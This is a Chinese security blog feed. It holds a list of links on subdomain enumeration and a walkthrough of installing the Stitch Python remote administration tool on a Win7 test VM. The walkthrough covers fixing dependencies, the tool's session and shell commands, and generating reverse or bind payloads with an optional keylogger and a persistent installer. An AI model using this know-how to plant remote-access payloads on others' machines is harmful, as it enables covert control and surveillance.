rgb(73, 68, 68);">:</span><span style="font-size: 15px;color: rgb(0, 122, 170);"><a href="https://gist.github.com/yamakira/2a36d3ae077558ac446e4a89143c69ab" target="_blank">https://gist.github.com/yamakira/2a36d3ae077558ac446e4a89143c69ab</a></span><br/><span style="font-size: 15px;color: rgb(0, 0, 0);">Freebuf对该文章的译文</span><span style="font-size: 15px;color: rgb(73, 68, 68);">：</span><span style="font-size: 15px;color: rgb(0, 122, 170);"><a href="http://www.freebuf.com/articles/web/154809.html" target="_blank">http://www.freebuf.com/articles/web/154809.html</a></span><br/><span style="font-size: 15px;color: rgb(0, 0, 0);">嘶吼-通过对子域名的高效搜集与筛选日Yahoo</span><span style="font-size: 15px;color: rgb(73, 68, 68);">：</span><a href="https://mp.weixin.qq.com/s?__biz=MzI0MDY1MDU4MQ==&amp;mid=2247485237&amp;idx=4&amp;sn=d1a689cc7e221375b29de4e98ac6a37b&amp;scene=21#wechat_redirect" style="text-decoration: underline;font-size: 15px;color: rgb(0, 122, 170);"><span style="font-size: 15px;color: rgb(0, 122, 170);">https://mp.weixin.qq.com/s?__biz=MzI0MDY1MDU4MQ==&amp;mid=2247485237&amp;idx=4&amp;sn=d1a689cc7e221375b29de4e98ac6a37b</span></a><br/><span style="font-size: 15px;color: rgb(0, 0, 0);">美丽联合src-子域名枚举技术攻与防</span><span style="font-size: 15px;color: rgb(73, 68, 68);">： </span><a href="https://mp.weixin.qq.com/s?__biz=MzIzOTQ5NjUzOQ==&amp;mid=2247484019&amp;idx=1&amp;sn=02d131ddfe55154b08cb2128ba830962&amp;scene=21#wechat_redirect" style="text-decoration: underline;font-size: 15px;color: rgb(0, 122, 170);"><span style="font-size: 15px;color: rgb(0, 122, 170);">https://mp.weixin.qq.com/s?__biz=MzIzOTQ5NjUzOQ==&amp;mid=2247484019&amp;idx=1&amp;sn=02d131ddfe55154b08cb2128ba830962</span></a><br/><span style="font-size: 15px;color: rgb(0, 0, 0);">分享一下自己找子域名的思路</span><span style="font-size: 15px;color: rgb(73, 68, 68);">：</span><span style="font-size: 15px;color: rgb(0, 122, 170);"><a href="https://www.t00ls.net/viewthread.php?tid=44070" target="_blank">https://www.t00ls.net/viewthread.php?tid=44070</a></span><br/><span style="font-size: 15px;color: rgb(0, 0, 0);">子域名收集方法讨论</span><span style="font-size: 15px;color: rgb(73, 68, 68);">：</span><span style="font-size: 15px;color: rgb(0, 122, 170);"><a href="https://www.t00ls.net/viewthread.php?tid=34403" target="_blank">https://www.t00ls.net/viewthread.php?tid=34403</a></span><br/><span style="font-size: 15px;color: rgb(0, 0, 0);">通过主域名逐步抓取子域名</span><span style="font-size: 15px;color: rgb(73, 68, 68);">：</span><span style="font-size: 15px;color: rgb(0, 122, 170);"><a href="https://www.t00ls.net/viewthread.php?tid=39448" target="_blank">https://www.t00ls.net/viewthread.php?tid=39448</a></span><br/><span style="font-size: 15px;color: rgb(0, 0, 0);">撸了全网的443证书</span><span style="font-size: 15px;color: rgb(73, 68, 68);">：</span><span style="font-size: 15px;color: rgb(0, 122, 170);"><a href="https://www.t00ls.net/viewthread.php?tid=41361" target="_blank">https://www.t00ls.net/viewthread.php?tid=41361</a></span><br/><span style="font-size: 15px;color: rgb(73, 68, 68);">李劼杰-DNS域传送漏洞(一)：</span><span style="font-size: 15px;color: rgb(0, 122, 170);"><a href="http://www.lijiejie.com/dns-zone-transfer-1/" target="_blank">http://www.lijiejie.com/dns-zone-transfer-1/</a></span><br/><span style="font-size: 15px;color: rgb(0, 0, 0);">李劼杰-DNS域传送漏洞(二)</span><span style="font-size: 15px;color: rgb(73, 68, 68);">：</span><span style="font-size: 15px;color: rgb(0, 122, 170);"><a href="http://www.lijiejie.com/dns-zone-transfer-2/" target="_blank">http://www.lijiejie.com/dns-zone-transfer-2/</a></span><br/><span style="font-size: 15px;color: rgb(0, 0, 0);">freebuf文章</span><span style="font-size: 15px;color: rgb(73, 68, 68);">：</span><span style="font-size: 15px;color: rgb(0, 122, 170);"><a href="http://www.freebuf.com/articles/web/117006.html" target="_blank">http://www.freebuf.com/articles/web/117006.html</a></span><br/><span style="font-size: 15px;color: rgb(0, 0, 0);">Bugcrowd LevelUp 2017虚拟会议讲座上“Esoteric sub-domain枚举技术”中的所有材料。其中所使用到的技术上面基本都已经出现过了，所以没有再进行尝试。</span><span style="font-size: 15px;color: rgb(0, 122, 170);"><a href="https://github.com/appsecco/bugcrowd-levelup-subdomain-enumeration" target="_blank">https://github.com/appsecco/bugcrowd-levelup-subdomain-enumeration</a></span></p></blockquote><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">封面图片来自：</span><span style="font-size: 15px;color: rgb(0, 122, 170);"><a href="https://domain.me" target="_blank">https://domain.me</a></span></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(0, 122, 170);"></span></p><p><img class="" data-copyright="0" data-ratio="0.5626373626373626" style="" data-type="gif" data-w="910" src="https://wechat2rss.xlab.app/img-proxy/?k=95d10729&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2F4iacC3bS3Zh0V55pUNwDwWGcrF9cic5xpp4UgPuC8BFtRfWcuwVj6XaxI8RNibmjtiaYtrZVibWT7JfNRBo6er5Jeibg%2F640%3Fwx_fmt%3Dgif"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(0, 122, 170);"></span><br/></p>



<p><a href="2247483827">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=0e609ce7&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzU1NDYxMTE5OA%3D%3D%26mid%3D2247483827%26idx%3D1%26sn%3D12c8cf9bd9ca46e4bc6d20706ea50c7c%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Sat, 24 Mar 2018 18:10:00 +0800</pubDate>
    </item>
    <item>
      <title>Python远程管理工具——Stitch</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzU1NDYxMTE5OA==&amp;mid=2247483775&amp;idx=1&amp;sn=23574a8d21135f59ed4a85bd1340c684</link>
      <description>一款很有意思的工具，记录一下windows上安装体验的过程。</description>
      <content:encoded><![CDATA[<p>
原创 <span>m82a1</span> <span>2018-02-19 18:36</span> <span style="display: inline-block;"></span>
</p>

<p>一款很有意思的工具，记录一下windows上安装体验的过程。</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=dbedd209&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F4iacC3bS3Zh1NO1adxUqA9njGybENa3kibzkN5kJmgSOVbfImty7t1ytux7G1UlgyP6wiccR3gqo4taWc699HhQKg%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<p style="margin: 0px 0px 1.2em !important;"> <br/></p><p><img class="" data-copyright="0" data-cropselx1="0" data-cropselx2="480" data-cropsely1="0" data-cropsely2="200" data-ratio="0.5970149253731343" style="width: 450px;height: 269px;" data-type="gif" data-w="335" src="https://wechat2rss.xlab.app/img-proxy/?k=8f549c67&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2F4iacC3bS3Zh1BVB32BoazNN6jCuUQr99dh4ahBsSefawp3Q94pB2ibQpjLyibwEuMrgg3FJBA4MtOMnEb0sdqo6fA%2F640%3Fwx_fmt%3Dgif"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;"></span></p><p><br/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;">一款很有意思的工具，记录一下windows上安装体验的过程。</span></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;"><br/></span></p><blockquote style="margin: 1.2em 0px;border-left: 4px solid rgb(221, 221, 221);padding: 0px 1em;color: rgb(119, 119, 119);quotes: none;"><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;">环境：win7虚拟机</span></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;">Github上作者介绍工具支持win、lnx、osx三种系统，经过测试发现对应系统文件格式的payload文件只能在对应系统上面生成，所以Windows系统上只能生成exe格式的payload。</span></p></blockquote><p><br/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 24px;color: rgb(0, 122, 170);"><span style="color: rgb(0, 122, 170);font-size: 15px;"></span>• 安装</span><span style="font-size: 15px;"></span></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);">先到官网下好python2.7，安装好之后解压stitch的文件开始使用pip安装所需的module。根据文件的名称和git上的提示，先“<strong>pip install -r win_requirements.txt</strong>”试一下。结果会发现这样会有很多报错堆叠在一起。</span></p><p><br/></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(39, 39, 39);"></span></p><p style="margin: 5px 8px;"><img class="" data-backh="522" data-backw="556" data-copyright="0" data-ratio="0.9389880952380952" data-s="300,640" style="width: 100%;height: auto;" data-type="png" data-w="672" src="https://wechat2rss.xlab.app/img-proxy/?k=19abc96b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1NO1adxUqA9njGybENa3kib8M1IicqIO99CfomyWooxxahcQ7t8ZoIBZ2pcOGUqZUYhyfALwNfSxSQ%2F640%3Fwx_fmt%3Dpng"/><span style="font-size: 15px;color: rgb(91, 90, 90);"><br/></span></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);">先是会提示缺少“msvcp90.dll”，可以直接去百度下载一个扔到“c:\windows\system32”目录下面。</span></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);"><br/></span></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);">根据报错提示逐个解决，首先提示“PIL”这个module有问题，经过一番搜索，发现虽然“pip search PIL”是有一个”PIL” 存在的，但是似乎并不是我们要的”PIL” 。</span></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);"><br/></span></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);">最终解答是使用”pillow”代替。所以单独”<strong>pip install pillow</strong>”就可以了。去txt里面删掉”PIL”内容，继续往下走。<span style="color: rgb(39, 39, 39);font-size: 15px;"><br/></span></span></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);"><br/></span></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);"></span><img class="" data-copyright="0" data-ratio="0.35066864784546803" data-s="300,640" style="" data-type="png" data-w="673" src="https://wechat2rss.xlab.app/img-proxy/?k=24b7265d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1NO1adxUqA9njGybENa3kibtJmruO8wCicUxnqP8zMRuXevxiaiaMzSSWOroyTrqlv9QnAexz5aFLgTA%2F640%3Fwx_fmt%3Dpng"/><span style="font-size: 15px;color: rgb(91, 90, 90);"><br/></span></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);">“logging”又出问题了，直接说解决办法，就是直接”<strong>pip install logging</strong>”，继续走。<span style="color: rgb(39, 39, 39);font-size: 15px;"><br/></span></span></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);"><br/></span></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);"></span><img class="" data-copyright="0" data-ratio="0.3208955223880597" data-s="300,640" style="" data-type="png" data-w="670" src="https://wechat2rss.xlab.app/img-proxy/?k=526ae6dc&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1NO1adxUqA9njGybENa3kibgwRFWDOCxcpGDrh7JUibibRFG7mY1Dc8ibibBfXLJdlKXAHicH9eWZbEtzQ%2F640%3Fwx_fmt%3Dpng"/><span style="font-size: 15px;color: rgb(91, 90, 90);"><br/></span></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);">此处”py2exe”有个小坑，如果直接去下载最新版的py2exe安装，到最后面一步会提示”No module named machinery”，我翻遍了百度也没找到与这个module相关的有用信息。</span></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);"><br/></span></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);">绝望了一阵，在google上找到了解决办法，那就是<strong>安装 0.6.9版本的”py2exe”</strong>(下载链接附在下面了)，继续往下。<span style="color: rgb(39, 39, 39);font-size: 15px;"><br/></span></span></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);"><br/></span></p><p style="margin: 5px 8px;"><img class="" data-copyright="0" data-ratio="0.29185185185185186" data-s="300,640" style="" data-type="png" data-w="675" src="https://wechat2rss.xlab.app/img-proxy/?k=b6322f7a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1NO1adxUqA9njGybENa3kiblTRDj9PThSibiaBqyd45wkWcCUKxfO1bt7seCcgzIXk0ef4ZOqMicCibuQ%2F640%3Fwx_fmt%3Dpng"/><span style="font-size: 15px;color: rgb(91, 90, 90);"><br/></span></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);">“pyHook”出问题，百度下载安装(下载链接附在下面)，继续走。</span></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);"><br/></span></p><p style="margin: 5px 8px;"><img class="" data-copyright="0" data-ratio="0.23529411764705882" data-s="300,640" style="" data-type="png" data-w="680" src="https://wechat2rss.xlab.app/img-proxy/?k=ef27670e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1NO1adxUqA9njGybENa3kibgky4xjHNeFqiadJStBtum4MDhvs7xHotOCdUTZteDEtCazGv9VX2AibA%2F640%3Fwx_fmt%3Dpng"/><span style="font-size: 15px;color: rgb(91, 90, 90);"><br/></span></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);">“pywin32”单独下载安装(链接于文末)，去txt删除相关内容，继续。</span></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);"><br/></span></p><p style="margin: 5px 8px;"><img class="" data-copyright="0" data-ratio="0.5258493353028065" data-s="300,640" style="" data-type="png" data-w="677" src="https://wechat2rss.xlab.app/img-proxy/?k=5fdf7d2c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1NO1adxUqA9njGybENa3kibtv6VZStjWPxDdPAvnHwdvYpHJG00SBdmX3wunKdzDVm2bMx8H3cTMQ%2F640%3Fwx_fmt%3Dpng"/><span style="font-size: 15px;color: rgb(91, 90, 90);"><br/></span></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);">需要vc++ 9.0，按照链接地址下载安装就可以，go on。</span></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);"><br/></span></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);"></span><img class="" data-copyright="0" data-ratio="0.6454005934718101" data-s="300,640" style="" data-type="png" data-w="674" src="https://wechat2rss.xlab.app/img-proxy/?k=b0d3e1e1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1NO1adxUqA9njGybENa3kibibqz7ia61ibNVUZM2oU70abuNACPdufuTkOL6nJSUdnIskfkDOP8lDrsQ%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 5px 16px;"><br/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(91, 90, 90);">Nice，经历一堆报错，至此，所有必须的module都已经安装完成，启动感受一下。</span></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 24px;color: rgb(0, 122, 170);">• 使用</span></p><p style="margin: 5px 8px;"><img class="" data-copyright="0" data-ratio="0.6416791604197901" data-s="300,640" style="" data-type="png" data-w="667" src="https://wechat2rss.xlab.app/img-proxy/?k=dd09e61e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1NO1adxUqA9njGybENa3kibGvNgBkOMY9PA2icqvZdeGcjFC6RyJJquVF3y3upKSwNyaoXrMDVqiadw%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 5px 16px;"><br/></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);">默认监控<strong>4040</strong>端口，防火墙要给”python.exe”放行。输入”help”可以获得帮助信息，输入<strong>”help 特定命令”</strong>可以获得该命令的详细介绍。例如一开始让我误以为是linux当中在文件读取末尾做标识的“EOF”，其实只是exit用的…</span></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);"><br/></span></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);"></span><img class="" data-copyright="0" data-ratio="0.3175775480059084" data-s="300,640" style="" data-type="png" data-w="677" src="https://wechat2rss.xlab.app/img-proxy/?k=9839f045&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1NO1adxUqA9njGybENa3kibzQmb9Yft25JglHQhbQ20TN39HLqTsXIjopY5fJx9VQ4ZpWqHsyPvFg%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 5px 8px;"><img class="" data-copyright="0" data-ratio="0.20710059171597633" data-s="300,640" style="" data-type="png" data-w="676" src="https://wechat2rss.xlab.app/img-proxy/?k=0a437ad7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1NO1adxUqA9njGybENa3kibbg0VjKB1cfDtrP8mQsnDqK4YLicWG8s0l7Nkwk5rlXibKmQ6vvywouCQ%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 5px 16px;"><br/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(91, 90, 90);">在stitch当中主机和目标之间的通信使用的是<strong>AES</strong>加密，在生成payload的同时会生成一个AES密钥，添加到所有payload当中。因此想要访问其他stitch生成的payload，则<strong>AES密钥必须相匹配</strong>才行。</span></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(91, 90, 90);">想要对payload进行跨主机或者跨系统操作时，必须使用“showkey”和“addkey”命令为新系统上的stitch添加上其他主机的密钥。不过我没做跨系统连接的尝试，从命令来看理论上应该是没毛病的。</span></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(91, 90, 90);">像“ipconfig”和“ifconfig”这种命令都是通用的，下面只对一些不怎么常见的命令做个简单个人理解的解释。</span></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;"><br/></span></p><blockquote style="margin: 1.2em 0px;border-left: 4px solid rgb(221, 221, 221);padding: 0px 1em;color: rgb(119, 119, 119);quotes: none;"><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(0, 0, 0);"><strong><span style="font-size: 15px;">EOF</span></strong></span><span style="font-size: 15px;"><strong><span style="font-size: 15px;color: rgb(73, 68, 68);"></span></strong><span style="font-size: 15px;color: rgb(73, 68, 68);">：同exit Addkey：添加一个新key Connect：当生成的payload为bind类型的时候，使用”connect [target] [port]“来连接</span></span></p><p style="margin: 0px 0px 1.2em !important;"><strong><span style="font-size: 15px;"><span style="font-size: 15px;color: rgb(73, 68, 68);">payload History</span></span></strong><span style="font-size: 15px;"><span style="font-size: 15px;color: rgb(73, 68, 68);">：列出上线过的机器历史记录</span></span></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(0, 0, 0);"><strong>History_remove</strong></span><span style="color: rgb(73, 68, 68);font-size: 15px;">：使用”history_remove [target]“来移除指定的历史记录</span></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(0, 0, 0);"><strong>Home</strong></span><span style="color: rgb(73, 68, 68);font-size: 15px;">：返回到stitch的初始界面 Listen：使用“listen [port]”命令添加监听端口</span></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(0, 0, 0);"><strong>Lsmod</strong></span><span style="color: rgb(73, 68, 68);font-size: 15px;">：在Windows系统上是罗列出所有的驱动程序</span></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(0, 0, 0);"><strong>Sessions</strong></span><span style="color: rgb(73, 68, 68);font-size: 15px;">：同msf当中一样，列出当前在线主机，不过测试的时候发现主机下线后有时候会不同步 Shell：使用“shell [session]”命令获得指定session的</span></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(0, 0, 0);"><strong>shell Showkey</strong></span><span style="color: rgb(73, 68, 68);font-size: 15px;">：列出当前的key</span></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(0, 0, 0);"><strong>Start</strong></span><span style="color: rgb(73, 68, 68);font-size: 15px;">：和cmd当中的start一样，“start calc”就会打开程序员专用计算器</span></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(0, 0, 0);"><strong>Stitchgen</strong></span><span style="color: rgb(73, 68, 68);font-size: 15px;">：创建一个基于宿主OS的史迪崽payload</span></p></blockquote><p><br/></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);">下面就创建个payload测试下。<br/>输入<strong>Stitchgen</strong>开始生成payload，首先会询问是否使用当前配置。<br/></span></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);"><br/></span></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);"></span><img class="" data-copyright="0" data-ratio="0.47619047619047616" data-s="300,640" style="width: 556px;height: auto;" data-type="png" data-w="672" src="https://wechat2rss.xlab.app/img-proxy/?k=68ea234a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1NO1adxUqA9njGybENa3kib83mko0ia1rGP5icf0HOYAzcpaSkHBRlz7Gp27b4A1HPb9F75PcdwxNsA%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 5px 16px;"><br/></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);">选择“Y”的话就直接开始生成payload了，选“N”会重新配置一遍，因为默认监听的4040端口，也为了演示的全面一点，所以我选“N”。</span></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);"><br/></span></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);"></span><img class="" data-copyright="0" data-ratio="0.19555555555555557" data-s="300,640" style="" data-type="png" data-w="675" src="https://wechat2rss.xlab.app/img-proxy/?k=62d1183b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1NO1adxUqA9njGybENa3kibngXdAqVHbIoao3u2AY4CUmFCxTADavCZiaG2g4Zt2ZBNGSTLdBrYQDg%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 5px 16px;"><br/></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);">接下来会选择payload的连接方式是“bind”还是“reverse”以及填写连接方式对应的通信地址，我在测试的过程中发现同时给一个payload直连和反弹的通信方式最终确实是会上线的。</span></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);">但是如果向一个正在以反弹方式进行通信的会话进行connect的话，会发生错误，没有深究是通信冲突还是因为我本机测试的原因。如果非要两种通信方式同时保留的话，我会选择bind和reverse各自单独创建一个payload。</span></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);"><br/></span></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);"></span><img class="" data-copyright="0" data-ratio="0.11504424778761062" data-s="300,640" style="" data-type="png" data-w="678" src="https://wechat2rss.xlab.app/img-proxy/?k=66c56416&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1NO1adxUqA9njGybENa3kibMuyj8khRgM1mkomanYMUb1a448ic2fN6dapMd112D9ibhpjibSib4bCxLw%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);">后面的两个选项是让你选择是否需要email你和是否需要键盘记录功能，邮件功能使用的是gmail，自动略过(熟悉python的可以尝试修改一下，不过我觉得意义不是很大)。</span></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);"><br/></span></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);"></span><img class="" data-copyright="0" data-ratio="0.47032640949554894" data-s="300,640" style="" data-type="png" data-w="674" src="https://wechat2rss.xlab.app/img-proxy/?k=63a24c8f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1NO1adxUqA9njGybENa3kibhgYUlhTj2RPygM2TXnx7beh9qqeM4yNx0w8nffD6aTNnuichuBtvoQQ%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 5px 16px;"><br/></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);">再敲回车会跳回到生成payload的初始界面，此时选择“Y”的时机已到！</span></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);"><br/></span></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);"></span><img class="" data-copyright="0" data-ratio="0.22814814814814816" data-s="300,640" style="" data-type="png" data-w="675" src="https://wechat2rss.xlab.app/img-proxy/?k=f8d85199&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1NO1adxUqA9njGybENa3kibYR3hLawapBl25mEciakXoibHNYibxmCE2spSSvCAFUUn9hhyNEhtcjAqg%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 5px 16px;"><br/></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);">提示正在生成exe格式的payload，不过在Linux上测试的时候我发现提示是一样的，也会提示生成exe。</span></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);"><br/></span></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);"></span><img class="" data-copyright="0" data-ratio="0.21418020679468242" data-s="300,640" style="" data-type="png" data-w="677" src="https://wechat2rss.xlab.app/img-proxy/?k=e0433ca9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1NO1adxUqA9njGybENa3kibt3tvHA2VLY1XOCEekwdHOPl4kosy4TpQ7HzbGIdZkaOzicJOHrjOvVA%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 5px 16px;"><br/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(91, 90, 90);">    不出意外的话进度条会顺利到达%100，但是测试过程中我出现过一种比较意外的情况，进度条走到%60左右会突然冒出多行进度细节，然后最后报个“拒绝访问”一类的错误才%100。最终也没有找到原因，因为这个情况时有时无。不过不必担心，因为即使爆出细节我最终测试也是正常上线的。</span></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);">询问我们是否需要用NSIS做个安装包，此处选择“N”的话直接就只生成上绿色版单文件非安装版的payload，选择“Y”的话就会调用NSIS创建安装版(<strong>安装版会写启动项服务，重启后仍然上线</strong>)。</span></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);"><br/></span></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);">这里有个小坑，我是使用32位win7虚拟机测试的，C盘下只有“Program Files”目录，没有“Program Files (x86)”目录，而安装NSIS时会默认安装在“Program Files”目录当中，但是stitch当中只认x86目录下的NSIS。</span></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);">所以小伙伴们，动动你的奶子想一想，我们去<strong>C盘新建一个“Program Files (x86)”目录</strong>再把NSIS自定义安装到该文件夹当中就可以解决这个ZZ问题了。</span></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);"><br/></span></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);"></span><img class="" data-copyright="0" data-ratio="0.7650485436893204" data-s="300,640" style="" data-type="png" data-w="515" src="https://wechat2rss.xlab.app/img-proxy/?k=56703955&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1NO1adxUqA9njGybENa3kibb74L2b0Yqa3BbGmynsUGhPGp2UjZejyxDuod2mbAtvjwFnrrDiaXxrw%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 5px 16px;"><br/></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);">当然有的时候他也它也会任性的报个错</span></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);"><br/></span></p><p style="margin: 5px 8px;"><span style="font-size: 15px;color: rgb(91, 90, 90);"></span><img class="" data-copyright="0" data-ratio="0.38074074074074077" data-s="300,640" style="" data-type="png" data-w="675" 